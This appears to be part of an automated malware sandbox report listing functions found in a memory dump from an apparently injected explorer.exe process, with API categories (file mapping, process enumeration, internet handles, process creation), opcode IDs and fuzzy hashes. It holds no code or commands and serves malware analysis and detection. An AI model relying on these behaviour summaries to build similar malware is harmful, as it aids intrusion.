                                                                                                                                            Function 02E0BB44 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 1610889594-2766056989
                                                                                                                                            • Opcode ID: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
                                                                                                                                            • Instruction ID: dc379e538667d3b9d681cde1332a7ef6dfbff9a1863c6898690e15b6ad709cc6
                                                                                                                                            • Opcode Fuzzy Hash: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
                                                                                                                                            • Instruction Fuzzy Hash: 2241FC32259B85C2DB60DB15E4D436EB361F7C4B98F50A125EA8E43BA8DF7CC486CB40
                                                                                                                                            Function 02E0C5C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 1610889594-2766056989
                                                                                                                                            • Opcode ID: 89cc15fca75ace34c048844633d37e36198ece7b99378586f91bb717b3fa10ee
                                                                                                                                            • Instruction ID: b731b8718621e276e3b20c0ccc0458f4bfc62e9311a1fd23a8430e26a94e3181
                                                                                                                                            • Opcode Fuzzy Hash: 89cc15fca75ace34c048844633d37e36198ece7b99378586f91bb717b3fa10ee
                                                                                                                                            • Instruction Fuzzy Hash: E0310A32258AC482D7609B55F4C435AB360F7C8B94F50A622EA9E93BA4DF7CC4D6CB00
                                                                                                                                            Function 02E0260C Relevance: 7.7, APIs: 5, Instructions: 174processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4137211488-0
                                                                                                                                            • Opcode ID: f7cf74ccca81ea4395c2b22979aaa675c72b38b0cad517df50d9b68bbf6d3949
                                                                                                                                            • Instruction ID: 6c4e79fe9f28a573efcbc8b062a2298d37b2c4ebd1119038abe73246581cde8c
                                                                                                                                            • Opcode Fuzzy Hash: f7cf74ccca81ea4395c2b22979aaa675c72b38b0cad517df50d9b68bbf6d3949
                                                                                                                                            • Instruction Fuzzy Hash: 42811C36249BC5D6CA60CB15E4C439AB3A5F788784F909525EB8D43BA8EF78C586CF40
                                                                                                                                            Function 02E0900C Relevance: 7.6, APIs: 5, Instructions: 121networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$Open
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2762225225-0
                                                                                                                                            • Opcode ID: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
                                                                                                                                            • Instruction ID: 7c553d6f14e11507f45ac562f79d779088a03e208164d8635eb4956bf7b33e0a
                                                                                                                                            • Opcode Fuzzy Hash: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
                                                                                                                                            • Instruction Fuzzy Hash: 9651F472258A8086D760CF55F49475AB7A0F3C9B98F40A025FB8A83BA9DF7DC485CF00
                                                                                                                                            Function 02E0B9A0 Relevance: 7.6, APIs: 5, Instructions: 79processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandlewsprintf$CreateProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2803068115-0
                                                                                                                                            • Opcode ID: b18e833e66d955f35563fdfa70050700d38f2023f4f5055f34abfc6722212c5f
                                                                                                                                            • Instruction ID: 45bb3c1f3a72a508b6fc6c2c06803474b32dd477f91b0f6b5156a6da8f048efc
                                                                                                                                            • Opcode Fuzzy Hash: b18e833e66d955f35563fdfa70050700d38f2023f4f5055f34abfc6722212c5f
                                                                                                                                            • Instruction Fuzzy Hash: 1641FB72298BC5D6DB60DB11E4943ABB761F7C4348F409429E6CD42AA8EF7CC59ACF40